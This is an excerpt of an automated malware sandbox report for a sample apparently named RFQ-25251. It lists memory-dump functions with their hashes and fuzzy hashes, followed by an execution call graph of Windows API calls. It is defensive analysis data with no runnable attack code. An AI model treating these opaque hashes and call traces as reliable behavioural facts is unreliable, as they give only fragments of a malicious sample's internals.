                              • String ID:
                              • API String ID:
                              • Opcode ID: 087b872eabd2a440cbfb753912c04a106b1db8966114181ce19be11b7c1f4560
                              • Instruction ID: 291308682d5bfaa4b8698b1e1ab5e22ce1d01ae75c7415dd97af5264f45878bc
                              • Opcode Fuzzy Hash: 087b872eabd2a440cbfb753912c04a106b1db8966114181ce19be11b7c1f4560
                              • Instruction Fuzzy Hash: C501D778E20349CFDB20CFA4D484ADCFBB4FB49215F20825AD819AB352D730A941CF90
                              Function 0144D758 Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1285964090.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_144d000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6d9819bc10fc25bfde5094c8dd9055cca9a6d80d10b7f370d6647202a44900a1
                              • Instruction ID: 0f40b5c9088e13d498f28593e18d3dc8982b2780cfa587577c695bad0e0f1892
                              • Opcode Fuzzy Hash: 6d9819bc10fc25bfde5094c8dd9055cca9a6d80d10b7f370d6647202a44900a1
                              • Instruction Fuzzy Hash: 5AF0C271804384AFE7208F0ACC84B63FFA8EF51624F28C45AED080F397C2799844CAB1
                              Function 078AEF10 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c7957c1cdaf0be7995fdc1d4787edfb066dab43a643b64409c1c8207cc69f777
                              • Instruction ID: 673006bdb6aeb4b09714bc5759367780808fc54cee27020e1fded383a1edd27b
                              • Opcode Fuzzy Hash: c7957c1cdaf0be7995fdc1d4787edfb066dab43a643b64409c1c8207cc69f777
                              • Instruction Fuzzy Hash: 7801FBB080021AEFEB14CF6AC4453AEBAF1FF49360F508665E424EA2A0D7744A45CF91
                              Function 078A44FB Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 03d35ac0142c63b15f98d886a8ea8f51e365a2dc63b2295a3e29b70d80575dbf
                              • Instruction ID: aebf178edf897292aed4cf98bf87d276d8ab3663fa43aa11c1b53226268d2670
                              • Opcode Fuzzy Hash: 03d35ac0142c63b15f98d886a8ea8f51e365a2dc63b2295a3e29b70d80575dbf
                              • Instruction Fuzzy Hash: BAF082B4A0518DAFDB01CFA8C5405AEBBF6EF4A200F1481A6DC59E7352DB31DE01CB51
                              Function 078AEFB0 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c9acc32a1f74871cd64f0db146018ebe85c75826c2d6d3c24380210891f5d307
                              • Instruction ID: cd8381990539c281cdeac5e4cfab7a8ed5eea044b033779c8d3d22b38cdbd86c
                              • Opcode Fuzzy Hash: c9acc32a1f74871cd64f0db146018ebe85c75826c2d6d3c24380210891f5d307
                              • Instruction Fuzzy Hash: E9E030767001245F53149B6AD884D6BB7EDFBCC664311807AE908C7310D9319C0186A0
                              Function 078A1C09 Relevance: .0, Instructions: 27COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cdccc10cba55350a54b8da8cd7d86e2f34b79c712d959e5c53bff1c63f3ef35a
                              • Instruction ID: cb27c7932252108e44a2109b4c2fdf037e9a8546ce9c9384ce8ea537d67fed9f
                              • Opcode Fuzzy Hash: cdccc10cba55350a54b8da8cd7d86e2f34b79c712d959e5c53bff1c63f3ef35a
                              • Instruction Fuzzy Hash: BFF0E5B09083C69FD306DBA8D54635DBF719F92101F1404EBC085873A3CA380D45C7A1
                              Function 078ADE40 Relevance: .0, Instructions: 24COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 370f9881f3259ec5ebf6ab7ea312f1c85cc3bf5b9c4443ffe011d8e45b6e0755
                              • Instruction ID: 2bb1907bcd01042f4766b9b1671cccf7d42839510f480621bc172f6cb8e0a2c5
                              • Opcode Fuzzy Hash: 370f9881f3259ec5ebf6ab7ea312f1c85cc3bf5b9c4443ffe011d8e45b6e0755
                              • Instruction Fuzzy Hash: 68F092B4A04208EFCB84DFA8D441A9DBBF5EB58300F10C1AAA81893351D7359A51DB90
                              Function 078AD548 Relevance: .0, Instructions: 22COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f1e2079375c83970f658499d66a07a5287eb6a56581a65c30380721cce4585f6
                              • Instruction ID: 6ec7f1c6dadccccf5e40c6ff74de548aa7154201a68004266fe56ac7823c013a
                              • Opcode Fuzzy Hash: f1e2079375c83970f658499d66a07a5287eb6a56581a65c30380721cce4585f6
                              • Instruction Fuzzy Hash: ADE01A75904208FBCF04DF94D841AADBBB5FB59314F148199EC08A7350C7329A61EB90
                              Function 078AB788 Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6933f3cca6bce7bb8a2b0374a5dce963a8a6968e4ac62925d98cf54fe3686acf
                              • Instruction ID: 3cf4b5431bb62da524654d660ad772b88ea1e841621b2b67d5a9f919577bebda
                              • Opcode Fuzzy Hash: 6933f3cca6bce7bb8a2b0374a5dce963a8a6968e4ac62925d98cf54fe3686acf
                              • Instruction Fuzzy Hash: 9CE08CF2819208EBE790EFF8980579DBBFCEB1A200F0044A9A409D3110EFB01A10DB92
                              Function 078ACC58 Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7135c327776c214de903f0e2987b2472a0dc02520983ec8da92888c1b1675366
                              • Instruction ID: fb4a0aefb8d3c8c231b15c24c4529feec583ff1acee333ec919529ef06350ad2
                              • Opcode Fuzzy Hash: 7135c327776c214de903f0e2987b2472a0dc02520983ec8da92888c1b1675366
                              • Instruction Fuzzy Hash: E6E04F74904208FBCB44DF94D945AACBBB5FB56310F10D199EC4857350D7329A51DB90
                              Function 078AD180 Relevance: .0, Instructions: 20COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e62e7ccae9a6f734ac4cbd2e12f8b7366c886f2d84d1c2403409295c1cd4b2c3
                              • Instruction ID: 9c20f330ce86214631d6dedecc6882eaba3b0319bee9c512b494079564805e41
                              • Opcode Fuzzy Hash: e62e7ccae9a6f734ac4cbd2e12f8b7366c886f2d84d1c2403409295c1cd4b2c3
                              • Instruction Fuzzy Hash: 65E08674904208EBC704DFA4D44196CFFB4EB55300F1091A9DC0853344C7315E51DB90
                              Function 078A1C18 Relevance: .0, Instructions: 20COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 29e7276949406acc790abc16c0dba3481686613eb60d95b7c570404ecf7f8da4
                              • Instruction ID: eaf86c6132b472eb803e2e413b402562d6dfe51d087fba1455b8bf632ecf131b
                              • Opcode Fuzzy Hash: 29e7276949406acc790abc16c0dba3481686613eb60d95b7c570404ecf7f8da4
                              • Instruction Fuzzy Hash: C0E046B4E14208EBDB18EFA8E58A6AEBB71EB85601F5040B99449233A0CE341E40DBD1
                              Function 078ACB10 Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9f792b22937f3ad3801179da30923aef694d7ba462aa337cc3da5686caf0fda5
                              • Instruction ID: 967075d5a39cb120a4301ede6fa272206a1a77ac6b0789021162227cd84ea8b1
                              • Opcode Fuzzy Hash: 9f792b22937f3ad3801179da30923aef694d7ba462aa337cc3da5686caf0fda5
                              • Instruction Fuzzy Hash: 1AE012B491830CEBD744DFA4E54166CBBB4EB85304F5091A9DC0967351DB325E42DB91
                              Function 078A4650 Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 10f61d89dd335bf1a702c3560db306b24084d6268d1b238a64f119b9a768368d
                              • Instruction ID: 6cfcee3d8e1a7a65c34367bd48d7c40487aa8e96ee29dcfd99d1a6efd2dc72cb
                              • Opcode Fuzzy Hash: 10f61d89dd335bf1a702c3560db306b24084d6268d1b238a64f119b9a768368d
                              • Instruction Fuzzy Hash: 91D017E005F7C68EE3525BB8681A3647FB49B17225F2804D7A08CC6563CBA84468C7A3
                              Function 078A4660 Relevance: .0, Instructions: 11COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0fe55badedf2e889d2808cfeefcd448e26adb6781680cd018c449311e0adc7ea
                              • Instruction ID: eb78292a8d95318d13581035c090835c7458c0769dc95fd117288ba043cfae46
                              • Opcode Fuzzy Hash: 0fe55badedf2e889d2808cfeefcd448e26adb6781680cd018c449311e0adc7ea
                              • Instruction Fuzzy Hash: 4EC02BF00BC34DCBF5601FD8700E37476FCA712105F101111740C408118FF40010C9D1

                              Non-executed Functions

                              Function 081075D8 Relevance: .3, Instructions: 326COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a2955347a9c70f6e549eb305f162694d599bea6242f61d4e98bb5a38e8dc8c0b
                              • Instruction ID: e9bc67cdd78022020c43e25247d549f58560c64a0b4f0c1c4918281c04aa0a05
                              • Opcode Fuzzy Hash: a2955347a9c70f6e549eb305f162694d599bea6242f61d4e98bb5a38e8dc8c0b
                              • Instruction Fuzzy Hash: C0E13E74E042198FDB14CFA9C580AAEFBB2FF89301F24855AD414AB396D775AD41CFA0
                              Function 08107A30 Relevance: .3, Instructions: 312COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae692e6b94cd63812b487e5543e3b8343a8469f9dd891d9f6e3835a9faae2325
                              • Instruction ID: 3b787ac679576574252872a3d4936cf312e6ba2ce87f0656fb220a21fdeb78e3
                              • Opcode Fuzzy Hash: ae692e6b94cd63812b487e5543e3b8343a8469f9dd891d9f6e3835a9faae2325
                              • Instruction Fuzzy Hash: 95E12C74E002198FDB14CF99C580AAEFBB2FF89301F248569D414AB395D775AD42CFA1
                              Function 08109C68 Relevance: .3, Instructions: 312COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a5877b3bd54dfa61bd33decb205c95383d2876af11398dda5881f1006e3ede61
                              • Instruction ID: b253f284eeb536887af613e5fce619ee2355b5e2cf2b7e01ec56b22ca46f294e
                              • Opcode Fuzzy Hash: a5877b3bd54dfa61bd33decb205c95383d2876af11398dda5881f1006e3ede61
                              • Instruction Fuzzy Hash: 9BE10C74E002198FDB14CF99C590AAEFBB2FF89301F248169D414AB356D775AD42CFA1
                              Function 08107E68 Relevance: .3, Instructions: 312COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f234a6381d9b02cbb4c775be22a9c364b1d25404483c5b89adf3ec99c0609022
                              • Instruction ID: bd0a1299a64d917c96a6241d209665b0d9606b911a5e39910c26756906716ee8
                              • Opcode Fuzzy Hash: f234a6381d9b02cbb4c775be22a9c364b1d25404483c5b89adf3ec99c0609022
                              • Instruction Fuzzy Hash: BDE1ED74E042198FDB14CFA9C980AAEFBB2FF89305F248169D414AB355D775AD42CFA0
                              Function 08109108 Relevance: .3, Instructions: 312COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 50a3b6bfbc90336ff1eafde371aeada78820603d12e6347a59aa342d9226fff1
                              • Instruction ID: de2f1d2fc51f61245c9a2a701a2cfdfd1931fed4ca3ffc36bbd0630b74f9638b
                              • Opcode Fuzzy Hash: 50a3b6bfbc90336ff1eafde371aeada78820603d12e6347a59aa342d9226fff1
                              • Instruction Fuzzy Hash: E4E1FB74E002198FDB14CFA9C590AAEFBB2FF89305F24816AD414AB356D7759D42CFA0
                              Function 0810F8B0 Relevance: .3, Instructions: 298COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e0320ee4dbd6bf73e7efbfabbe79e598e9250c9c88080a4bb79b31ff73a09b4d
                              • Instruction ID: 36ee5ebaf269d6b21a37d653d732fbdaf8657c957658b5dfce56dbac54feb62f
                              • Opcode Fuzzy Hash: e0320ee4dbd6bf73e7efbfabbe79e598e9250c9c88080a4bb79b31ff73a09b4d
                              • Instruction Fuzzy Hash: 9DD1B274A00604CFDB18DF69C999AA9B7F1AF8D701F2580A9E405EB3B1DB71AD41CF60
                              Function 015DDDD4 Relevance: .3, Instructions: 264COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1286217307.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_15d0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 67abd6f9b7d2f02a5bc088cb845c47933d435ba537a960d0eaa596c2c3547298
                              • Instruction ID: a0a1652dd2cc977bccb3ce46b2299fb2fc30deadd061a40b2ec88ab2ba3ac3e2
                              • Opcode Fuzzy Hash: 67abd6f9b7d2f02a5bc088cb845c47933d435ba537a960d0eaa596c2c3547298
                              • Instruction Fuzzy Hash: 8EA16F32A0021A8FCF25DFB8C84459EBBB2FFD4300B15856AE906AF265DB71D956CB40
                              Function 078AF528 Relevance: .3, Instructions: 264COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 34fe86ef5934315c58f946c477971e2fd932e32336e4eec9c181f31f6f84fb82
                              • Instruction ID: a595ae2fd57a037283035756ff9dce568d8aeece7a3c4444984c937d9a0b634b
                              • Opcode Fuzzy Hash: 34fe86ef5934315c58f946c477971e2fd932e32336e4eec9c181f31f6f84fb82
                              • Instruction Fuzzy Hash: 0BD1E679C2065A8ADB20EBA5D89069DB771FFA5300F50C79AD5093B210EFB06EC4CF91
                              Function 078A4685 Relevance: .2, Instructions: 161COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b417f759d3ac8d888a2caaf080da9bfc02ab4d27a507f3c7ae69b7c72ad08775
                              • Instruction ID: b4b7ff69dd8c3eee14e3f5f2c37ff03abc76ef47d42779845956fdcbca022613
                              • Opcode Fuzzy Hash: b417f759d3ac8d888a2caaf080da9bfc02ab4d27a507f3c7ae69b7c72ad08775
                              • Instruction Fuzzy Hash: F0612C74E202098FE709DFABE88179ABBF2FB88200F14C529D415AB365EF741945CF91
                              Function 078A4690 Relevance: .2, Instructions: 159COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 702e442bbe69d01bb0eb6f720a2056ca550e75fa2cb29a04b71e2bef2854ddd9
                              • Instruction ID: db9f01592e5cb9b2e8a531f7b14e5f0094cb49bef8f86704652f59b72f9ebf69
                              • Opcode Fuzzy Hash: 702e442bbe69d01bb0eb6f720a2056ca550e75fa2cb29a04b71e2bef2854ddd9
                              • Instruction Fuzzy Hash: F8611C74E202098FE709DFABE88179ABBF2FB88600F14C529D415AB364EF741945CF95
                              Function 08100F48 Relevance: .2, Instructions: 153COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d6920b716459ec471bcddfd27930e6873e2cc79317966245bce938c187b7914d
                              • Instruction ID: 4721f632537ee9117e481b3a40f388819e350c00e2446dd9a33ed9fa64a27ef9
                              • Opcode Fuzzy Hash: d6920b716459ec471bcddfd27930e6873e2cc79317966245bce938c187b7914d
                              • Instruction Fuzzy Hash: AB51C474E051199FDB04DFAAD9805AEFBF2FF88301F24C16AE458A7355DB3499428F90
                              Function 08100F44 Relevance: .1, Instructions: 119COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ab581058e19076f6bd25850ebfbeec9047665546aedff1d0d533bf1fec1417a1
                              • Instruction ID: f102cfc11035c2c8ddd076ac270faafb9c0680d2b13e4fd5dd85532f8aa0ab55
                              • Opcode Fuzzy Hash: ab581058e19076f6bd25850ebfbeec9047665546aedff1d0d533bf1fec1417a1
                              • Instruction Fuzzy Hash: FC413CB5E051199FDB08CFAAD9416AEFBF2FF88301F14C42AE408A7354DB3499428F90
                              Function 078A4E18 Relevance: .1, Instructions: 117COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 11aee9b1d222e7e20539f54b4c26c0730e319079153a06b92814879feff5449d
                              • Instruction ID: 0c52d1a9de212fb59be5657a3d2550c92ba7a04683483efd86282ac166f9345f
                              • Opcode Fuzzy Hash: 11aee9b1d222e7e20539f54b4c26c0730e319079153a06b92814879feff5449d
                              • Instruction Fuzzy Hash: 485192B4D016288FEB68CF6AD944799BAF3BFC8200F14C1EAD40DA7264DB751A95CF40
                              Function 078A4E13 Relevance: .1, Instructions: 71COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289609916.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_78a0000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7071a1fbf6531ec575d4846b0383c57d1be9ca6f4370cf6aaee50fe638a7ed5d
                              • Instruction ID: b88c35936346e3027d5805e0b5a3dbc532daa9cdf068a2cdcfa57678998b3c0e
                              • Opcode Fuzzy Hash: 7071a1fbf6531ec575d4846b0383c57d1be9ca6f4370cf6aaee50fe638a7ed5d
                              • Instruction Fuzzy Hash: CB3166B1D016598BFB68CF6BD94578EFAF3AFC8200F14C1BAC40CAA254EB7509958F40

                              Execution Graph

                              Execution Coverage:1.2%
                              Dynamic/Decrypted Code Coverage:4.9%
                              Signature Coverage:7.7%
                              Total number of Nodes:142
                              Total number of Limit Nodes:11
                              execution_graph 95576 42a863 95577 42a880 95576->95577 95580 12b2df0 LdrInitializeThunk 95577->95580 95578 42a8a8 95580->95578 95581 4243e3 95585 4243f2 95581->95585 95582 424436 95589 42d113 95582->95589 95585->95582 95586 424471 95585->95586 95588 424476 95585->95588 95587 42d113 RtlFreeHeap 95586->95587 95587->95588 95592 42b5a3 95589->95592 95591 424443 95593 42b5bd 95592->95593 95594 42b5ce RtlFreeHeap 95593->95594 95594->95591 95596 424053 95597 42406f 95596->95597 95598 424097 95597->95598 95599 4240ab 95597->95599 95601 42b233 NtClose 95598->95601 95606 42b233 95599->95606 95603 4240a0 95601->95603 95602 4240b4 95609 42d233 RtlAllocateHeap 95602->95609 95605 4240bf 95607 42b250 95606->95607 95608 42b261 NtClose 95607->95608 95608->95602 95609->95605 95610 428953 95611 4289b0 95610->95611 95612 4289e3 95611->95612 95615 413833 95611->95615 95614 4289c5 95616 4137f8 95615->95616 95617 413847 95615->95617 95620 42b4b3 95616->95620 95617->95614 95621 42b4cd 95620->95621 95624 12b2c70 LdrInitializeThunk 95621->95624 95622 413815 95622->95614 95624->95622 95625 42e1f3 95626 42e203 95625->95626 95627 42e209 95625->95627 95630 42d1f3 95627->95630 95629 42e22f 95633 42b553 95630->95633 95632 42d20e 95632->95629 95634 42b570 95633->95634 95635 42b581 RtlAllocateHeap 95634->95635 95635->95632 95636 413c73 95637 413c8d 95636->95637 95642 417673 95637->95642 95639 413cab 95640 413cf0 95639->95640 95641 413cdf PostThreadMessageW 95639->95641 95641->95640 95643 417697 95642->95643 95644 4176d3 LdrLoadDll 95643->95644 95645 41769e 95643->95645 95644->95645 95645->95639 95646 41acd3 95647 41ad17 95646->95647 95648 42b233 NtClose 95647->95648 95649 41ad38 95647->95649 95648->95649 95650 41ddf3 95651 41de19 95650->95651 95655 41df07 95651->95655 95656 42e323 95651->95656 95653 41deab 95653->95655 95662 42a8b3 95653->95662 95657 42e293 95656->95657 95658 42d1f3 RtlAllocateHeap 95657->95658 95659 42e2f0 95657->95659 95660 42e2cd 95658->95660 95659->95653 95661 42d113 RtlFreeHeap 95660->95661 95661->95659 95663 42a8d0 95662->95663 95666 12b2c0a 95663->95666 95664 42a8fc 95664->95655 95667 12b2c1f LdrInitializeThunk 95666->95667 95668 12b2c11 95666->95668 95667->95664 95668->95664 95669 401ab8 95670 401ad5 95669->95670 95673 42e6b3 95670->95673 95676 42cd13 95673->95676 95677 42cd36 95676->95677 95688 407243 95677->95688 95679 42cd4c 95687 401b45 95679->95687 95691 41aae3 95679->95691 95681 42cd6b 95682 42cd80 95681->95682 95706 42b5f3 95681->95706 95702 427303 95682->95702 95685 42cd8f 95686 42b5f3 ExitProcess 95685->95686 95686->95687 95709 4163a3 95688->95709 95690 407250 95690->95679 95692 41ab0f 95691->95692 95720 41a9d3 95692->95720 95695 41ab3c 95696 42b233 NtClose 95695->95696 95699 41ab47 95695->95699 95696->95699 95697 41ab70 95697->95681 95698 41ab54 95698->95697 95700 42b233 NtClose 95698->95700 95699->95681 95701 41ab66 95700->95701 95701->95681 95703 42735d 95702->95703 95705 42736a 95703->95705 95731 4181c3 95703->95731 95705->95685 95707 42b610 95706->95707 95708 42b621 ExitProcess 95707->95708 95708->95682 95710 4163ba 95709->95710 95712 4163d3 95710->95712 95713 42bc93 95710->95713 95712->95690 95715 42bcab 95713->95715 95714 42bccf 95714->95712 95715->95714 95716 42a8b3 LdrInitializeThunk 95715->95716 95717 42bd24 95716->95717 95718 42d113 RtlFreeHeap 95717->95718 95719 42bd39 95718->95719 95719->95712 95721 41a9ed 95720->95721 95725 41aac9 95720->95725 95726 42a953 95721->95726 95724 42b233 NtClose 95724->95725 95725->95695 95725->95698 95727 42a970 95726->95727 95730 12b35c0 LdrInitializeThunk 95727->95730 95728 41aabd 95728->95724 95730->95728 95732 4181ed 95731->95732 95738 41865b 95732->95738 95739 413da3 95732->95739 95734 4182fa 95735 42d113 RtlFreeHeap 95734->95735 95734->95738 95736 418312 95735->95736 95737 42b5f3 ExitProcess 95736->95737 95736->95738 95737->95738 95738->95705 95746 413dc2 95739->95746 95740 413ee0 95741 413f17 95740->95741 95749 41adf3 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 95740->95749 95741->95734 95743 413ef4 95743->95741 95750 41adf3 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 95743->95750 95745 413f0d 95745->95734 95746->95740 95746->95741 95748 4137f3 LdrInitializeThunk 95746->95748 95748->95740 95749->95743 95750->95745 95751 418878 95752 42b233 NtClose 95751->95752 95753 418882 95752->95753 95595 12b2b60 LdrInitializeThunk

                              Executed Functions

